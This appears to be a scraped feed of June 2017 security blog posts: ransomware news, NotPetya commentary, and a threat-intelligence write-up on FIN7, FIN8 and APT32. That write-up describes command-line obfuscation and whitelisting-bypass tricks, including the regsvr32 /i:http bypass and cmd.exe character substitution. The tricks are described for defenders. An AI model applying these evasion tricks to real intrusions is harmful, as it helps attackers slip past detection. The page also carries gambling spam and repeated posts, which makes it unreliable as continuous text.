Should you would want to perform any of our free slots to try to win genuine hard cash, remember to see our genuine moolah slots portion. We pay quite a lot of your time researching the most suitable online casinos that give you a high quality choice of slots to play for legitimate capital.LeBron James [...]
from Play Real Money Poker On Android Usa
Friday, June 30, 2017
Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques
Throughout 2017 we have observed a marked increase in the use of command line evasion and obfuscation by a range of targeted attackers. Cyber espionage groups and financial threat actors continue to adopt the latest cutting-edge application whitelisting bypass techniques and introduce innovative obfuscation into their phishing lures. These techniques often bypass static and dynamic analysis methods and highlight why signature-based detection alone will always be at least one step behind creative attackers.
In early 2017, FIN8 began using environment variables paired with PowerShell’s ability to receive commands via StdIn (standard input) to evade detection based on process command line arguments. In the February 2017 phishing document “COMPLAINT Homer Glynn.doc” (MD5: cc89ddac1afe69069eb18bac58c6a9e4), the file contains a macro that sets the PowerShell command in one environment variable (_MICROSOFT_UPDATE_CATALOG) and then the string “powershell -” in another environment variable (MICROSOFT_UPDATE_SERVICE). When a PowerShell command ends in a dash then PowerShell will execute the command that it receives via StdIn, and only this dash will appear in powershell.exe’s command line arguments. Figure 1 provides the commands that were extracted using Mandiant consultant Nick Carr’s FIN8 macro decoder.
Figure 1: FIN8 environment variable commands extracted from “COMPLAINT Homer Glynn.doc” macros
To evade many detections based on parent-child process relationships, FIN8 crafted this macro to use WMI to spawn the cmd.exe execution. Therefore, WinWord.exe never creates a child process, but the process tree looks like: wmiprvse.exe à cmd.exe à powershell.exe. FIN8 has regularly used obfuscation and WMI to remotely launch their PUNCHTRACK POS-scraping malware, and the 2017 activity is an implementation of these evasion techniques at an earlier stage of compromise.
As new application whitelisting bypass techniques have surfaced, targeted attackers have quickly adopted these into their campaigns with extra layers of obfuscation to stay ahead of many defenders. Many groups leverage the regsvr32.exe application whitelisting bypass, including APT19 in their 2017 campaign against law firms. The cyber espionage group APT32 heavily obfuscates their backdoors and scripts, and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017. Instead of using the argument /i:http for the regsvr32.exe bypass, APT32 used cmd.exe obfuscation techniques to attempt to break signature-based detection of this argument in April 2017. At FireEye we have seen them include both /i:^h^t^t^p and /i:h”t”t”p in their lures. Figure 2 shows a redacted screenshot of our Host Investigative Platform (HIP) capturing real-time attacker activity during one of our Mandiant incident response engagements for APT32 activity.
Figure 2: APT32 command obfuscation for regsvr32.exe application whitelisting bypass
Meanwhile, FIN7 has continued to wreak havoc on the restaurant, hospitality, and financial services sectors in 2017. To ensure their arsenal did not grow stale, in April 2017 FIN7 shifted to using wscript.exe to run JavaScript payloads that retrieve an additional payload hidden in the phishing document by use of the Word.Application COM object.
This week, FireEye identified FIN7 introducing additional obfuscation techniques at both the JavaScript and cmd.exe levels. These methods rely on FIN7’s preferred method of hiding shortcut files (LNK files) in their DOCX and RTF phishing documents to initiate the infection. At the time of this blog, the files implementing this technique were detected by 0 antivirus engines. For JavaScript, instead of specifying “Word.Application” for the COM object instantiation, FIN7 began concatenating the string to “Wor”+”d.Application”. In addition, JavaScript’s suspicious “eval” string was transformed into “this[String.fromCharCode(101)+’va’+’l’]”. Finally, they used a little-known character replacement functionality supported by cmd.exe. The wscript.exe command is set in a process-level environment variable “x”, but is obfuscated with the “@” character. When the “x” variable is echoed at the end of the script the “@” character is removed by the syntax “%x:@=%”. Figure 3 shows this command extracted from a LNK file embedded within a new FIN7 phishing document.
Figure 3: FIN7 command obfuscation from LNK file phishing document
In this example, FIN7 implements FIN8’s passing of commands via StdIn – this time passing it to cmd.exe instead of powershell.exe – but the evasion effect is the same. While this example will expose these arguments in the first cmd.exe’s command execution, if this environment variable were set within the LNK or a macro and pushed to cmd.exe via StdIn from VBA, then nothing would appear on the command line.
The FireEye iSIGHT Intelligence MySIGHT Portal contains detailed information on these attackers – and all financial and cyber espionage groups that we track – including analysis of their malware, tactics, and further intelligence attribution.
We fully expect targeted attackers to continue this pattern of adopting new bypass techniques and adding innovative obfuscation at both the macro and command line levels. As for what we might see next, we’d recommend reading up on DOS command line tricks so that monitoring your network isn’t the first time you see new attacker tricks. Network defenders must understand what obfuscation is possible, assess their endpoint and network visibility, and most importantly not rely on a single method to detect these attacks.
from Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques
Food Supplier Passes Squid Off as Octopus
According to a lawsuit (main article behind paywall), "a Miami-based food vendor and its supplier have been misrepresenting their squid as octopus in an effort to boost profits."...
from Food Supplier Passes Squid Off as Octopus
from Food Supplier Passes Squid Off as Octopus
Details from the 2017 Workshop on Economics and Information Security
The 16th Workshop on Economics and Information Security was this week. Ross Anderson liveblogged the talks....
from Details from the 2017 Workshop on Economics and Information Security
from Details from the 2017 Workshop on Economics and Information Security
Cyber Security Roundup for June 2017
Another large scale ransomware cyber attack caused chaos and dominated the media headlines around the world this month. The Petya ransomware, a copycat of WannaCry, caused major operational impact to organisations neglecting to apply Microsoft Windows critical security updates. There were reports of the malware significantly impacting British marketing firm WPP, a Jewson hardware store, Ukrainian national infrastructure associated firms, and even halting production at a Cadbury chocolate factory in Australia.
Aside from the Peyta ransomware outbreak, it was another busy month of significant cyber security attacks and data compromises across the UK. The UK Parliament's email system was hacked with around 90 email accounts compromised due to the usage of weak passwords by parliament staff, it is not certain how many of 90 were MPs or not, but I wouldn't surprised if there were more than a few using weak passwords. There were further cyber troubles for the UK government after its Digital Service website data.gov.uk data was compromised. Virgin media told 800,000 of its users to change their router passwords after it was discovered that hackers could access Virgin's Super Hub 2 routers. And there was yet more critical security patches released this month, as Microsoft and application vendors fight to stay ahead of cyber criminals and nation-state actors software exploits.
Over in the United States, a US Health Insurer forked out £90 million to cover compensation and legal costs after hackers stolen customer records in its care. We could well see these types of large payouts in the UK soon after the General Data Protection Regulation (GDPR) kicks in May 2018. The GDPR gives the Information Commissioners Office (ICO) new powers to fine up to 10 Million Euros or 2% the previous year global turnover of the company, for any cyber security breaches. Data subjects will also have the right to take companies to court to seek damages as well. The ICO will get double those penalty rates for privacy rights breaches, ouch! Under the GDPR companies are forced to fess up to all security incidents which compromises or places personal data at risk, both to the ICO and to each data subject impacted, so there will be no hiding place for security breaches in the UK after next May.
Finally, US Cert and Incapsula released an interesting advisory about 'Hidden Cobra', a North Korean Cyber Threat group. This nation-state group is seemingly ramping up their capabilities at the moment, and are behind the DeltaCharlie campaign and linked with the WannaCry ransomware outbreak last month, well worth a read.
NEWS
- Peyta / NotPeyta / Petrwrap Ransomware Attack
- NSA & GCHQ link North Korean with the global WannaCry Ransomware Attack
- Parliament Cyber Attack 'hit up to 90 users'
- UK Government Digital Service Site User Data Breached
- Four Arrests in UK over Microsoft Technical Support Scam Phone Calls
- UK Online Fraud Overlooked by the Government, Police and Business
- Password Manager OneLogin hit by Data Breach
- Virgin Media tells 800,000 Users to Change Passwords over Router Hacking Risk
- ICO Fines Gloucester City Council £100k for not patching the Heartbleed Bug
- The US Health Insurer is to pay out over £90m after Hackers Stole Customer Records
- WannaCry Cyber Attack Halts Production at Honda
- Cyber Due-Diligence Now Forms an Essential part of M&A Planning
- UK Hacker exploits Clydesdale & Yorkshire Online Bank loophole to Steal £100,000
- Personal Details of nearly 200 Million US Citizens Exposed
- South Korean Hosting Firm Pays $1 Million Ransom
- Microsoft to Remove SMB1 protocol used by WannaCry & Peyta from Windows 10
- Microsoft release Security Updates to fix 94 flaws, including on Windows XP & Windows 2003
- Adobe releases Critical Security Updates Flash Player and Shockwave Player
- Hidden Cobra: North Korea’s DDoS Botnet Infrastructure
- Hidden Cobra and DeltaCharlie: An Explainer
- Apple Mac computers targeted by Ransomware and Spyware
- Firewall Adware Epidemic Infects 9% of UK Networks
- 2017 Trustwave Global Security Report
- PwC 2016 Digital Annual Report: UK Councils unable to cope with Cyber Threats
- Druva Annual Ransomware Report: 2017 Survey
from Cyber Security Roundup for June 2017
Cyber Security Roundup for June 2017
Another large scale ransomware cyber attack caused chaos and dominated the media headlines around the world this month. The Petya ransomware, a copycat of WannaCry, caused major operational impact to organisations neglecting to apply Microsoft Windows critical security updates. There were reports of the malware significantly impacting British marketing firm WPP, a Jewson hardware store, Ukrainian national infrastructure associated firms, and even halting production at a Cadbury chocolate factory in Australia.
Aside from the Peyta ransomware outbreak, it was another busy month of significant cyber security attacks and data compromises across the UK. The UK Parliament's email system was hacked with around 90 email accounts compromised due to the usage of weak passwords by parliament staff, it is not certain how many of 90 were MPs or not, but I wouldn't surprised if there were more than a few using weak passwords. There were further cyber troubles for the UK government after its Digital Service website data.gov.uk data was compromised. Virgin media told 800,000 of its users to change their router passwords after it was discovered that hackers could access Virgin's Super Hub 2 routers. And there was yet more critical security patches released this month, as Microsoft and application vendors fight to stay ahead of cyber criminals and nation-state actors software exploits.
Over in the United States, a US Health Insurer forked out £90 million to cover compensation and legal costs after hackers stolen customer records in its care. We could well see these types of large payouts in the UK soon after the General Data Protection Regulation (GDPR) kicks in May 2018. The GDPR gives the Information Commissioners Office (ICO) new powers to fine up to 10 Million Euros or 2% the previous year global turnover of the company, for any cyber security breaches. Data subjects will also have the right to take companies to court to seek damages as well. The ICO will get double those penalty rates for privacy rights breaches, ouch! Under the GDPR companies are forced to fess up to all security incidents which compromises or places personal data at risk, both to the ICO and to each data subject impacted, so there will be no hiding place for security breaches in the UK after next May.
Finally, US Cert and Incapsula released an interesting advisory about 'Hidden Cobra', a North Korean Cyber Threat group. This nation-state group is seemingly ramping up their capabilities at the moment, and are behind the DeltaCharlie campaign and linked with the WannaCry ransomware outbreak last month, well worth a read.
NEWS
- Peyta / NotPeyta / Petrwrap Ransomware Attack
- NSA & GCHQ link North Korean with the global WannaCry Ransomware Attack
- Parliament Cyber Attack 'hit up to 90 users'
- UK Government Digital Service Site User Data Breached
- Four Arrests in UK over Microsoft Technical Support Scam Phone Calls
- UK Online Fraud Overlooked by the Government, Police and Business
- Password Manager OneLogin hit by Data Breach
- Virgin Media tells 800,000 Users to Change Passwords over Router Hacking Risk
- ICO Fines Gloucester City Council £100k for not patching the Heartbleed Bug
- The US Health Insurer is to pay out over £90m after Hackers Stole Customer Records
- WannaCry Cyber Attack Halts Production at Honda
- Cyber Due-Diligence Now Forms an Essential part of M&A Planning
- UK Hacker exploits Clydesdale & Yorkshire Online Bank loophole to Steal £100,000
- Personal Details of nearly 200 Million US Citizens Exposed
- South Korean Hosting Firm Pays $1 Million Ransom
- Microsoft to Remove SMB1 protocol used by WannaCry & Peyta from Windows 10
- Microsoft release Security Updates to fix 94 flaws, including on Windows XP & Windows 2003
- Adobe releases Critical Security Updates Flash Player and Shockwave Player
- Hidden Cobra: North Korea’s DDoS Botnet Infrastructure
- Hidden Cobra and DeltaCharlie: An Explainer
- Apple Mac computers targeted by Ransomware and Spyware
- Firewall Adware Epidemic Infects 9% of UK Networks
- 2017 Trustwave Global Security Report
- PwC 2016 Digital Annual Report: UK Councils unable to cope with Cyber Threats
- Druva Annual Ransomware Report: 2017 Survey
from Cyber Security Roundup for June 2017
BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
Permalink
from BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
from BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
Permalink
from BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
from BSides Cleveland 2017, Michael Benich’s ‘Hacking in Highschool: Inspiring the Next Generation of Security Professionals’
SSD Advisory – Odoo CRM Code Execution
Vulnerability Summary The following advisory describe arbitrary Python code execution found in Odoo CRM version 10.0 Odoo is a suite of open source business apps that cover all your company needs: CRM, eCommerce, accounting, inventory, point of sale, project management, etc. Odoo’s unique value proposition is to be at the same time very easy to … Continue reading SSD Advisory – Odoo CRM Code Execution
from SSD Advisory – Odoo CRM Code Execution
from SSD Advisory – Odoo CRM Code Execution
Food Supplier Passes Squid Off as Octopus
According to a lawsuit (main article behind paywall), "a Miami-based food vendor and its supplier have been misrepresenting their squid as octopus in an effort to boost profits."
from Food Supplier Passes Squid Off as Octopus
Details from the 2017 Workshop on Economics and Information Security
The 16th Workshop on Economics and Information Security was this week. Ross Anderson liveblogged the talks.
from Details from the 2017 Workshop on Economics and Information Security
Ben’s Book of the Month: Review of “Information Security Policies Made Easy”
This month’s theme is policy & government. As information security becomes even more important in government, business and life, information security policies are being developed to combat the emerging threats and regulate industry. The importance of effective information security policies cannot be overemphasized, as they are the foundation toward implementing information security and ensuring the security of the people, systems, and networks within an organization. If an organization lacks security policies, they cannot inform employees and users of their specific security responsibilities. …
from Ben’s Book of the Month: Review of “Information Security Policies Made Easy”
from Ben’s Book of the Month: Review of “Information Security Policies Made Easy”
Risk Containment Strategies to Avoid the Next Petya
By: Todd Inskeep and Chris Taylor Ransomware has been in the headlines with Petya, like WannaCry before it, spreading rapidly around the globe. If you are not familiar with this week’s news, organizations around the globe suffered another ransomware attack on Tuesday including pharmaceutical companies, Chernobyl radiation detection systems, the Kiev metro, as well as airports and banks. Addressing these advanced attacks as simple malware outbreaks is not enough. Nor can you just replay the ransomware prevention handbook with good backups. Organizations need to fundamentally approach advanced…
from Risk Containment Strategies to Avoid the Next Petya
from Risk Containment Strategies to Avoid the Next Petya
UK government threatens to launch drone strikes against hackers
For all its bombastic bravado, the UK government would be wise to remember that it is incredibly difficult to accurately attribute an attack. Read more in my article on the Hot for Security blog.
from UK government threatens to launch drone strikes against hackers
from UK government threatens to launch drone strikes against hackers
Coming Microsoft Reorg to Support Cloud-First Strategy: Report
Microsoft is expected to announced a business reorganization plan on July 5 read more
from Coming Microsoft Reorg to Support Cloud-First Strategy: Report
from Coming Microsoft Reorg to Support Cloud-First Strategy: Report
Cyber News Rundown: Edition 6/30/17
The Cyber News Rundown brings you the latest happenings in cyber news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things...read more
The post Cyber News Rundown: Edition 6/30/17 appeared first on Webroot Threat Blog.
from Cyber News Rundown: Edition 6/30/17
This company deliberately deleted its customer email mailing list. Maybe you should too
With much tougher data protection regulations coming into force in March 2018 in the form of GDPR, it may be a canny move to securely wipe such information sooner rather than later.
from This company deliberately deleted its customer email mailing list. Maybe you should too
from This company deliberately deleted its customer email mailing list. Maybe you should too
AnswerX – Akamai’s ‘Secret’ DNS Platform
As I work with Operators all over the world, I'm amazed at two factors which are a worrying. First, Operators are still treating DNS as an afterthought. Everyone knows that if DNS is down, the network is down. Too many...
from AnswerX – Akamai’s ‘Secret’ DNS Platform
from AnswerX – Akamai’s ‘Secret’ DNS Platform
Things we have learned about Petna, the Petya-based malware
Earlier this week, we saw another mass ransomware attack happen, less than two months after the WannaCry outbreak. In the hours and days after the attack, this strain was given many different names, including Petya, Petna, NotPetya, EternalPetya, Nyetya, and many more. We originally referred to it as Petya-based, but for simplicity, let’s call it Petna.
from Things we have learned about Petna, the Petya-based malware
How to Create a Retention Policy and Apply it to User Mailboxes in Exchange Online
Karim Buzdar When a new user account is created in Office 365 and assigned an Exchange Online license, its mailbox is automatically created. That mailbox is assigned a def...
from How to Create a Retention Policy and Apply it to User Mailboxes in Exchange Online
from How to Create a Retention Policy and Apply it to User Mailboxes in Exchange Online
IT Pro Today PODCAST – Episode 3
Round Table: Petya Ransomware and Upcoming Windows 10 Security Enhancements This is episode three of the new IT Pro Today PODCAST with Richard Hay and Michael Morisy. re...
from IT Pro Today PODCAST – Episode 3
from IT Pro Today PODCAST – Episode 3
Good Article About Google's Project Zero
Fortune magazine just published a good article about Google's Project Zero, which finds and publishes exploits in other companies' software products.
I have mixed feeling about it. The project does great work, and the Internet has benefited enormously from these efforts. But as long as it is embedded inside Google, it has to deal with accusations that it targets Google competitors.
from Good Article About Google's Project Zero
The Women of Bletchley Park
Really good article about the women who worked at Bletchley Park during World War II, breaking German Enigma-encrypted messages.
from The Women of Bletchley Park
Websites Grabbing User-Form Data Before It's Submitted
Websites are sending information prematurely:
...we discovered NaviStone's code on sites run by Acurian, Quicken Loans, a continuing education center, a clothing store for plus-sized women, and a host of other retailers. Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
This is important because it goes against what people expect:
In yesterday's report on Acurian Health, University of Washington law professor Ryan Calo told Gizmodo that giving users a "send" or "submit" button, but then sending the entered information regardless of whether the button is pressed or not, clearly violates a user's expectation of what will happen. Calo said it could violate a federal law against unfair and deceptive practices, as well as laws against deceptive trade practices in California and Massachusetts. A complaint on those grounds, Calo said, "would not be laughed out of court."
This kind of thing is going to happen more and more, in all sorts of areas of our lives. The Internet of Things is the Internet of sensors, and the Internet of surveillance. We've long passed the point where ordinary people have any technical understanding of the different ways networked computers violate their privacy. Government needs to step in and regulate businesses down to reasonable practices. Which means government needs to prioritize security over their own surveillance needs.
from Websites Grabbing User-Form Data Before It's Submitted
Thursday, June 29, 2017
How to Choose a WordPress Security Plugin that’s Right for You
There are currently 50,416 plugins available in the WordPress repository. Out of these, roughly seven percent are security-based plugins. At the same time, when you search Google for “WordPress security plugin,” 14,600,000 results come up. How can you choose a plugin from all these options? To answer that question, it’s important to understand what a […]… Read More
The post How to Choose a WordPress Security Plugin that’s Right for You appeared first on The State of Security.
from How to Choose a WordPress Security Plugin that’s Right for You
NonPetya: no evidence it was a “smokescreen”
Many well-regarded experts claim that the not-Petya ransomware wasn't "ransomware" at all, but a "wiper" whose goal was to destroy files, without any intent at letting victims recover their files. I want to point out that there is no real evidence of this.
Certainly, things look suspicious. For one thing, it certainly targeted the Ukraine. For another thing, it made several mistakes that prevent them from ever decrypting drives. Their email account was shutdown, and it corrupts the boot sector.
But these things aren't evidence, they are problems. They are things needing explanation, not things that support our preferred conspiracy theory.
The simplest, Occam's Razor explanation explanation is that they were simple mistakes. Such mistakes are common among ransomware. We think of virus writers as professional software developers who thoroughly test their code. Decades of evidence show the opposite, that such software is of poor quality with shockingly bad bugs.
It's true that effectively, nPetya is a wiper. Matthieu Suiche does a great job describing one flaw that prevents it working. @hasherezade does a great job explaining another flaw. But best explanation isn't that this is intentional. Even if these bugs didn't exist, it'd still be a wiper if the perpetrators simply ignored the decryption requests. They need not intentionally make the decryption fail.
Thus, the simpler explanation is that it's simply a bug. Ransomware authors test the bits they care about, and test less well the bits they don't. It's quite plausible to believe that just before shipping the code, they'd add a few extra features, and forget to regression test the entire suite. I mean, I do that all the time with my code.
Some have pointed to the sophistication of the code as proof that such simple errors are unlikely. This isn't true. While it's more sophisticated than WannaCry, it's about average for the current state-of-the-art for ransomware in general. What people think of, such the Petya base, or using PsExec to spread throughout a Windows domain, is already at least a year old.
Indeed, the use of PsExec itself is a bit clumsy, when the code for doing the same thing is already public. It's just a few calls to basic Windows networking APIs. A sophisticated virus would do this itself, rather than clumsily use PsExec.
Infamy doesn't mean skill. People keep making the mistake that the more widespread something is in the news, the more skill, the more of a "conspiracy" there must be behind it. This is not true. Virus/worm writers often do newsworthy things by accident. Indeed, the history of worms, starting with the Morris Worm, has been things running out of control more than the author's expectations.
What makes nPetya newsworthy isn't the EternalBlue exploit or the wiper feature. Instead, the creators got lucky with MeDoc. The software is used by every major organization in the Ukraine, and at the same time, their website was horribly insecure -- laughably insecure. Furthermore, it's autoupdate feature didn't check cryptographic signatures. No hacker can plan for this level of widespread incompetence -- it's just extreme luck.
Thus, the effect of bumbling around is something that hit the Ukraine pretty hard, but it's not necessarily the intent of the creators. It's like how the Slammer worm hit South Korea pretty hard, or how the Witty worm hit the DoD pretty hard. These things look "targeted", especially to the victims, but it was by pure chance (provably so, in the case of Witty).
Certainly, MeDoc was targeted. But then, targeting a single organization is the norm for ransomware. They have to do it that way, giving each target a different Bitcoin address for payment. That it then spread to the entire Ukraine, and further, is the sort of thing that typically surprises worm writers.
Finally, there's little reason to believe that there needs to be a "smokescreen". Russian hackers are targeting the Ukraine all the time. Whether Russian hackers are to blame for "ransomware" vs. "wiper" makes little difference.
Conclusion
We know that Russian hackers are constantly targeting the Ukraine. Therefore, the theory that this was nPetya's goal all along, to destroy Ukraines computers, is a good one.
Yet, there's no actual "evidence" of this. nPetya's issues are just as easily explained by normal software bugs. The smokescreen isn't needed. The boot record bug isn't needed. The single email address that was shutdown isn't significant, since half of all ransomware uses the same technique.
The experts who disagree with me are really smart/experienced people who you should generally trust. It's just that I can't see their evidence.
Update: comment asks "why is there no Internet spreading code?". The answer is "I don't know", but unanswerable questions aren't evidence of a conspiracy. "What aren't there any stars in the background?" isn't proof the moon landings are fake, such because you can't answer the question. One guess is that you never want ransomware to spread that far, until you've figured out how to get payment from so many people.
from NonPetya: no evidence it was a “smokescreen”
Certainly, things look suspicious. For one thing, it certainly targeted the Ukraine. For another thing, it made several mistakes that prevent them from ever decrypting drives. Their email account was shutdown, and it corrupts the boot sector.
But these things aren't evidence, they are problems. They are things needing explanation, not things that support our preferred conspiracy theory.
The simplest, Occam's Razor explanation explanation is that they were simple mistakes. Such mistakes are common among ransomware. We think of virus writers as professional software developers who thoroughly test their code. Decades of evidence show the opposite, that such software is of poor quality with shockingly bad bugs.
It's true that effectively, nPetya is a wiper. Matthieu Suiche does a great job describing one flaw that prevents it working. @hasherezade does a great job explaining another flaw. But best explanation isn't that this is intentional. Even if these bugs didn't exist, it'd still be a wiper if the perpetrators simply ignored the decryption requests. They need not intentionally make the decryption fail.
Thus, the simpler explanation is that it's simply a bug. Ransomware authors test the bits they care about, and test less well the bits they don't. It's quite plausible to believe that just before shipping the code, they'd add a few extra features, and forget to regression test the entire suite. I mean, I do that all the time with my code.
Some have pointed to the sophistication of the code as proof that such simple errors are unlikely. This isn't true. While it's more sophisticated than WannaCry, it's about average for the current state-of-the-art for ransomware in general. What people think of, such the Petya base, or using PsExec to spread throughout a Windows domain, is already at least a year old.
Indeed, the use of PsExec itself is a bit clumsy, when the code for doing the same thing is already public. It's just a few calls to basic Windows networking APIs. A sophisticated virus would do this itself, rather than clumsily use PsExec.
Infamy doesn't mean skill. People keep making the mistake that the more widespread something is in the news, the more skill, the more of a "conspiracy" there must be behind it. This is not true. Virus/worm writers often do newsworthy things by accident. Indeed, the history of worms, starting with the Morris Worm, has been things running out of control more than the author's expectations.
What makes nPetya newsworthy isn't the EternalBlue exploit or the wiper feature. Instead, the creators got lucky with MeDoc. The software is used by every major organization in the Ukraine, and at the same time, their website was horribly insecure -- laughably insecure. Furthermore, it's autoupdate feature didn't check cryptographic signatures. No hacker can plan for this level of widespread incompetence -- it's just extreme luck.
Thus, the effect of bumbling around is something that hit the Ukraine pretty hard, but it's not necessarily the intent of the creators. It's like how the Slammer worm hit South Korea pretty hard, or how the Witty worm hit the DoD pretty hard. These things look "targeted", especially to the victims, but it was by pure chance (provably so, in the case of Witty).
Certainly, MeDoc was targeted. But then, targeting a single organization is the norm for ransomware. They have to do it that way, giving each target a different Bitcoin address for payment. That it then spread to the entire Ukraine, and further, is the sort of thing that typically surprises worm writers.
Finally, there's little reason to believe that there needs to be a "smokescreen". Russian hackers are targeting the Ukraine all the time. Whether Russian hackers are to blame for "ransomware" vs. "wiper" makes little difference.
Conclusion
We know that Russian hackers are constantly targeting the Ukraine. Therefore, the theory that this was nPetya's goal all along, to destroy Ukraines computers, is a good one.
Yet, there's no actual "evidence" of this. nPetya's issues are just as easily explained by normal software bugs. The smokescreen isn't needed. The boot record bug isn't needed. The single email address that was shutdown isn't significant, since half of all ransomware uses the same technique.
The experts who disagree with me are really smart/experienced people who you should generally trust. It's just that I can't see their evidence.
Update: comment asks "why is there no Internet spreading code?". The answer is "I don't know", but unanswerable questions aren't evidence of a conspiracy. "What aren't there any stars in the background?" isn't proof the moon landings are fake, such because you can't answer the question. One guess is that you never want ransomware to spread that far, until you've figured out how to get payment from so many people.
from NonPetya: no evidence it was a “smokescreen”
Happy Agents = Satisfied Customers: How to Improve Your Call Centre Turnover
By Caroline Thomson, HR Director Life as a call centre agent tends to come with an infamous reputation. Typically high-stress, low-paying and repetitive, this kind of customer experience work means it can be difficult for call centres to retain their staff. With attrition rates of up to 50 per cent – a higher turnover rate […]
The post Happy Agents = Satisfied Customers: How to Improve Your Call Centre Turnover appeared first on Semafone.
from Happy Agents = Satisfied Customers: How to Improve Your Call Centre Turnover
Making “Connections” at the Industrial IoT University
Embedded Computing Design’s second Industrial IoT University conference occurred this week, with industry experts from Cisco, zigbee alliance, Digi International, LoRa Alliance, Trusted Computing Group, Renesas, Mentor Graphics, Wind River, Software Design Solutions, and Blue Ridge Advanced Design and Automation addressing networking and security challenges for an audience of more than 100 IoT engineers.
The post Making “Connections” at the Industrial IoT University appeared first on Trusted Computing Group.
from Making “Connections” at the Industrial IoT University
Protecting Oracle E-Business Suite: Password Policy
For a third week in a row, we’re providing you with best practices for securing your Oracle E-Business Suite implementation. Today, we are going to talk about a common topic: password security. When it comes to password policy, the first thing that probably comes to mind is having a secure password. That is why in addition to all network security layers, it is very important to have a proper password policy, along with a users list and groups so to follow a guideline of how passwords are formed.
06/29/2017
from Protecting Oracle E-Business Suite: Password Policy
BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
Permalink
from BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
from BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
Permalink
from BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
from BSides Cleveland 2017, David Kennedy’s ‘Bypassing Next Gen Tech’
Facebook gives moderators “full access” to user accounts suspected of terror links
Big problem: Facebook and others have refused to define what "terrorism" is.
from Facebook gives moderators “full access” to user accounts suspected of terror links
from Facebook gives moderators “full access” to user accounts suspected of terror links
Facebook gives moderators “full access” to user accounts suspected of terror links
Big problem: Facebook and others have refused to define what "terrorism" is.
from Facebook gives moderators “full access” to user accounts suspected of terror links
from Facebook gives moderators “full access” to user accounts suspected of terror links
Does Going Serverless Save You Money?
451 Research investigates whether serverless is cheaper, and which vendors give you the most bang for your buck read more
from Does Going Serverless Save You Money?
from Does Going Serverless Save You Money?
Code Failure, Again
Cartoon by Rudy Lacovara at Angry .Net Developer Meanwhile, in i...
from Code Failure, Again
from Code Failure, Again
Hacking nuclear submarines – how likely is the nightmare scenario?
Nuclear submarines run on Windows XP - but is that the ships' weakest point?
from Hacking nuclear submarines – how likely is the nightmare scenario?
from Hacking nuclear submarines – how likely is the nightmare scenario?
Untangle Named to Gartner’s 2017 Magic Quadrant for Unified Threat Management (SMB Multifunction Firewalls)
Untangle Recognized for Second Consecutive Year SAN JOSE, Calif. – June 29, 2017 – Untangle®, Inc., Untangle® Inc., a leader in comprehensive network security for small-to-medium business, today announced that Gartner, Inc. has named Untangle to its 2017 Magic Quadrant for Unified Threat Management (SMB Multifunction Firewalls)* for the second consecutive year. Gartner defines the […]
from Untangle Named to Gartner’s 2017 Magic Quadrant for Unified Threat Management (SMB Multifunction Firewalls)
from Untangle Named to Gartner’s 2017 Magic Quadrant for Unified Threat Management (SMB Multifunction Firewalls)
Webinar: Stomp Out Malware from Encrypted Traffic with Cisco Stealthwatch and Cognitive Analytics
Blog Post Webinar: Stomp Out Malware from Encrypted Traffic with Cisco Stealthwatch and Cognitive Analytics Jun 29, 2017 Did you know that more than 40% of malware is hiding in encrypted traffic ...
from Webinar: Stomp Out Malware from Encrypted Traffic with Cisco Stealthwatch and Cognitive Analytics
from Webinar: Stomp Out Malware from Encrypted Traffic with Cisco Stealthwatch and Cognitive Analytics
Microsoft Adds Cloudyn to their Portfolio for Cloud Analytics and Usage Optimization on Azure
Microsoft's latest acquisition will be used to help Azure customers maximize their usage of cloud based services and save costs. read more
from Microsoft Adds Cloudyn to their Portfolio for Cloud Analytics and Usage Optimization on Azure
from Microsoft Adds Cloudyn to their Portfolio for Cloud Analytics and Usage Optimization on Azure
Facial recognition: it’s much more widespread than you might think
From dating apps to scanning faces in a football crowd, the AI-driven technology is increasingly ubiquitous - but it's not without its problems
from Facial recognition: it’s much more widespread than you might think
from Facial recognition: it’s much more widespread than you might think
The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners
There are two different kinds of web application vulnerability scanners; heuristic and signature based scanners. This article explains how both types of scanners work and what type of vulnerabilities they can find in web applications. How Do Signature ...
from The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners
from The Advantage of Heuristic Over Signature Based Web Vulnerability Scanners
Future-proof your Cisco ACE refresh
It has been a while since Cisco announced end-of-life for its Application Control Engine (ACE) products. The last date of support, January 31, 2019, is fast approaching. If you rely on ACE for load balancing in your environment, it is time to migrate and look to the future. Key considerations for migrating from Cisco ACE: […]
The post Future-proof your Cisco ACE refresh appeared first on Radware Blog.
from Future-proof your Cisco ACE refresh
WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1)
The recent ransomware worm in the WannaCrypt or WannaCry (Wcry) malware infected more than 200,000 systems across 150 countries. The virus targeted out of date computing systems not unlike those that can be found in an industrial control system (ICS). While WannaCry impacted banks, healthcare providers and other non-industrial entities this time, next time the … Continue reading "WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1)"
The post WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1) appeared first on Trusted Computing Group.
from WannaCry Delivers a Wake-up Call for Protecting Industrial Control Systems: (Part 1)
How to Create a Public Folder in Office 365 Exchange Online
Karim Buzdar Public folders in exchange online are used to share information with other people in your organization. The content is organized in hierarchy which makes brow...
from How to Create a Public Folder in Office 365 Exchange Online
from How to Create a Public Folder in Office 365 Exchange Online
Wednesday, June 28, 2017
